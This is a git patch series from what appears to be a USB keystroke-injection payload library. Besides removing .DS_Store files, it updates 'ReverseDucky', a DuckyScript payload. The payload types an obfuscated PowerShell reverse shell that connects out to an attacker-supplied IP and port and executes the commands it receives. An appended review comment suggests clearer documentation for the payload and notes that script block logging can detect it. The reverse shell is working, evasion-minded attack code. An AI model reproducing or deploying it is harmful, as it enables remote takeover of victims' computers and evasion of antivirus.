From 63b19039346afdb229ddb7ae533581d946c2b851 Mon Sep 17 00:00:00 2001 From: Marc Date: Thu, 30 Sep 2021 15:20:46 +0100 Subject: [PATCH 1/2] misc: Remove .DS_Stores, add to git ignore --- .DS_Store | Bin 6148 -> 0 bytes .gitignore | 2 ++ payloads/.DS_Store | Bin 6148 -> 0 bytes payloads/library/.DS_Store | Bin 10244 -> 0 bytes payloads/library/execution/.DS_Store | Bin 6148 -> 0 bytes payloads/library/exfiltration/.DS_Store | Bin 6148 -> 0 bytes payloads/library/general/.DS_Store | Bin 6148 -> 0 bytes payloads/library/mobile/.DS_Store | Bin 6148 -> 0 bytes payloads/library/prank/.DS_Store | Bin 6148 -> 0 bytes payloads/library/recon/.DS_Store | Bin 6148 -> 0 bytes payloads/library/remote_access/.DS_Store | Bin 6148 -> 0 bytes 11 files changed, 2 insertions(+) delete mode 100644 .DS_Store create mode 100644 .gitignore delete mode 100644 payloads/.DS_Store delete mode 100644 payloads/library/.DS_Store delete mode 100644 payloads/library/execution/.DS_Store delete mode 100644 payloads/library/exfiltration/.DS_Store delete mode 100644 payloads/library/general/.DS_Store delete mode 100644 payloads/library/mobile/.DS_Store delete mode 100644 payloads/library/prank/.DS_Store delete mode 100644 payloads/library/recon/.DS_Store delete mode 100644 payloads/library/remote_access/.DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index edc44374060a489365b74ac8c22d2b3027c195da..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%}yIJ5Vk`AZxJE~BslugTMkM15gdReO%J^xEou*dV3&=^N}F|*-4H^I6E!V3_s_(d76a8PIztSP%B?hQ;jJ{splLVC-kmi=#BF)qe5PTzP(B zQ3$almc^OZQA02Dvq9SQ`zN}0w8}=x;M9@ zyYc;lWtYQ;Xk-O(0*_!678+mGy-U@_kM-!!teCE9wU7+4fAC@Jd;H^Yc3k+XxL)V^ zoWG$|@poN&{Ulb&6^u>RqvJ@30b+m{cq0bzXc0?qRFBFK1H{1lVL+b`5>%s$m|HYQ z2Q=mh09XdM5wP`JLgz?C7csX8BOu(S0@_rLPYiC;!7nk+Ma(VQbjI=V!Et7eFBEQO zhx*clGwxcXmKY!gUNSIeyA^%^fByUX|78;Ohyh~YT`|DREw9ytCE?v#Se(9VCFljH q79E#coTh+bu40JQSMfTi5%5cG0J?~|Meu;o9|1!HHN?O_W#9=p{&dp- 
diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..5a73fbc --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +# MacOS +.DS_Store diff --git a/payloads/.DS_Store b/payloads/.DS_Store deleted file mode 100644 index 7f79da04156e9cb0253e26dc005090c03541207d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKK}#z!5Kd~D)`KU7efSPf(OtLLh3%%aTT88#{RQs_ z=+E)yAMh&gAH09?W|Ams6+DQj%)sQEOlFei%aU{$W4zi8%ZwEmV*(U0=Ros<;5h1t zn*J%auNHjSb=9l?50XmKT7Itog9UA2-*J? zC86q7RW}JcdLGXVIF2Kn!@`fjpj@de7v=KG>aZvWYfGh~tgI~!hmM$AEU#}LHT!3S z^Wnv%A(z8MYHyY7YwOSBsCdA#s-iO!c?w(W!0E|Q}7Xz>W zz{JAj+zeKIF4oUV&ov@iR!|yf58!|YRVYFR+#YS+pc&8%Xa+O`ngPwgzrX;#v)N@% zbE#|1fM!55&}M+`4;B_C<3hH$q^$!hN&!%gVKZHLk9h#uSVG2yY;j4ZI3~{?3}I@B z6vN==*l#g)lyMK40<}+S)>j|oJ(D61~db`46xjN8nRHq+&!n{ z??Eoey0-6ACO<&M&Bsz%zf|VqPCXkuSjkT&ZP&L^!#uM#wfxfkbTLdjw+HQVK}JCv zKm=WRfF%nxI*{#LYnU5}7K57ttlQXCE=>mE*`VtZ|*X{7{EX3>BE92x!)>Z(i3XBfgt zc5{2P9i^cxJJWD)mMR^DbOK7~woTL0vFkxutmw~n*)0auXmrOI866v+m^4ju+MG3S zr3!vMRn1guK_XMR!M?3$ss&rzU%}0#eV?(f7M*%}?#P<&RWn7;sgQ9o=b*~XYeg^T z*AspXmobf#;vJDl#EhipjyD>yrKQDrYjJs{Id3&q7ozjl(&|F988MHZik-i_QQCai zc+`CSn*0Dm{EC1>{Cm58gLjITa(I;vHIT>H&k&_w4%vl|)(%&_4s)X>HeP#B`Fb^S~37N$$5KH@$u lWQ$8OM;$Up$xrkD`kw(h|EGhkyqXlTkm&rMSUC9k{~v^N_jmvR diff --git a/payloads/library/execution/.DS_Store b/payloads/library/execution/.DS_Store deleted file mode 100644 index 72bdb57b45895cbf96a54862988e5716c7505167..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKK}y3w6n&#bi!G=-7cR1JCq;ULsHq4dNUMS?wXIk%B}M7NT~44&ui+iMK@Z@{ zgZTc;*rv3p#f6Cc5A$F0^Zz984KtGgVD|d$DzFBi$R=1=p_^jzT-t;!_{b{J*gh(V z&_@e*s7z#QKow90{+a?Zch|9nV;ta=vvxFp_i>MFJfMRc+_xWEaWhF`PV;%vCMw{I&T+CQy}};t!mMhW!1D5v$MC^ z@x^=dIoh?d{$=IzdHqTCGjO;9u7E4B{|c~YE3y+~_pX2|;0ml1(EmfADd&kh}WS<((g(h^QW zOo!yg?p*;_U{iquI~-{LAOF1n-z@SYSHKn6D+Q!qPRoK*O1*V!a@uPH?UAO?yv}%4 i!a;1s%+*$WMvGuP=zyFj?u;2Bd?65JaOVpAsRCc5!8>{Y 
diff --git a/payloads/library/general/.DS_Store b/payloads/library/general/.DS_Store deleted file mode 100644 index ea3f13457b648106ba173e38dbe45d6b8f3e7726..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%}xR_5dMlB2pGdnj(hM0ICx)iO-wv;@TdX{5*L<$M7`}3_)>ERX0t}*x#)@%yk(zg>>Oh};R+F^Xs>vy zK^ag6{u%@F?N)G#8w{!W@Aoe0)tl{fFmhWiyl(a!q*2sL(iS~RjktXLoV=WD^X}~6 zJ-W^BLe44Fc*68C;eK045c9;jSnizCZdjH2f42GlzZj$= zWk4DDR}7e9)QlQT$=BAEf=!1RiPpjXg8A{H<*7003(Y!YV)s0640`;!A8Mi1I7V z$rO#uAu>IOgb2c5*zX2$F4_)Q1}p=QjRAFbXP^!VgwTT<=T`>k`5koQsGn9Uf7n!^ zIQ?RVb3V&o@gH7W4!zV*2mOZM+f=$ry-W%J*4F|;U)Y+UfN0d+qJRD~{KW>8-p*ys`fv53Q3&{nmC$`OPvVP+6L zD9ofHnp8$51~ch6E-20=%nX`zU{riCTA5LW!u0AmztG{pT!Xf?3|IzkGf*(yl6wC? z-(UaVPO?4AfMwuGF~EvVui3yY(c7BaoO){o>Nctp6_***DcI0+tPS-PzeUx8KA{Xm VmoPJkBPjMqK+|9w%fN#&Z~@m6%)I~r diff --git a/payloads/library/prank/.DS_Store b/payloads/library/prank/.DS_Store deleted file mode 100644 index 133badb7c0f71a6f6b1a292aeb650508c4fed468..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%}T^D5T4N$3JbDFk2!hL!@fbcbj5?7*1OUzD43F>c&|_3L-}HUGZSSOi;EW# zoq^<=OlI=)m1Ytm;_9iL6U~UIKoMk7Mnue`U3=O20LVJVHJwqS2fC-zk%4}rN!ETy z=X6DvbU~ZzudtJjn)Y!Wo0Os~{!7PrJ729+*V``nd6$2e>bi-kfnRZavg}{t>tc6I z`|X(iZgXAopI#B5o062kJ z1-f1_fk6zwGUH$f3xq8cXrY{+7;NFNhwN8o91Ja-SZBsKdFJ=W3+D?i2X!Yd4ZU^- zoPliy_N_US{J+GnH2TQj4)K;V;0*jR26$4h>I$36x%JcbB-aL%8x#@o8$^LX*HjGD kRE&n4BS+e4{Xul}ml+2`8Aa?G4)lwF65^FJ@B<9I0hToVzGUYa4%fQSmXVDA{=2b1&S9qU=<5Xku&6H0VX6S|?tPPHfg zqXP2o&ghn&XolbV`%Cmn5xIuuG;5xxu}&$<7Pcsl^Wk`!7E9gn(bsmYMXIVgrW)17 z$NS0UTl~D*mf8G~xqMiE(hGfHkFJ0#;0o-y0_fRd#i^o4SHKl;1y%~k_aVRqOT$(% ze>xEI2mtIOoegW5C4>_UOT$(XXJD*UpiM{v89cZGJ5}Ht3in21 
diff --git a/payloads/library/remote_access/.DS_Store b/payloads/library/remote_access/.DS_Store deleted file mode 100644 index 0dff94cff0848e0c42599966ae0726472f886ad4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKu};H44E41cf+hVSD8JV5)0_?K;I)_-1IBDQY@7nHkTCGrM>~aWXsnUc$)*MYG0$G0 Date: Thu, 30 Sep 2021 16:39:47 +0200 Subject: [PATCH 2/2] Update ReverseDucky 1.1 to Version 1.2 (#22) Shorten the code to increase the speed --- .../remote_access/ReverseDucky/ReverseDucky.txt | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt index 7492c1d..169d7e9 100644 --- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt +++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt @@ -1,9 +1,9 @@ REM ReverseDucky -REM Version 1.1 +REM Version 1.2 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM Author: 0iphor13 -REM Reverse shell executed in the background +REM Reverse shell executed in the background - If blocked by Windows Defender, please contact me. REM Fill in Attacker IP & Port in line 18 REM DON'T FORGET TO START LISTENER 
@@ -15,14 +15,12 @@
 DELAY 250
 ENTER
 DELAY 200
-STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl
+STRING $I='0.0.0.0';$P=4444;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient($
 DELAY 200
-STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n
+STRING I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject'
 DELAY 200
-STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | .
+STRING ) -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'PS'+(&
 DELAY 200
-STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0,
-DELAY 200
-STRING $sbt.Length);$S.Flush()};$C.Close()
+STRING ('pw'+'d')).Path+'>';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close()
 DELAY 100
 ENTER
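Review bot: The rewritten STRING lines change what the payload emits, not only its length, and the commit message ("Shorten the code to increase the speed") does not say so: the prompt is now built as `'PS'+(&('pw'+'d')).Path+'>'`, without the spaces that the old `'PS '+ … + '> '` form had. The four STRING lines are also cut at arbitrary offsets inside tokens (`TCPClient($` on one line, `I,$P)` on the next), which makes the one-liner hard to audit in a diff. A comment above them such as `REM The STRING lines below form one continuous PowerShell command; $I and $P are set in the first one` would document that and replace the fragile "line 18" pointer in the header. For readers on the defending side, the concatenated names (`'ie'+'x'`, `'New'+'-Obj'+'ect'`) only hide the literals in the typed text. Each command read from the socket is still passed to Invoke-Expression, and PowerShell script block logging, where enabled, records it there.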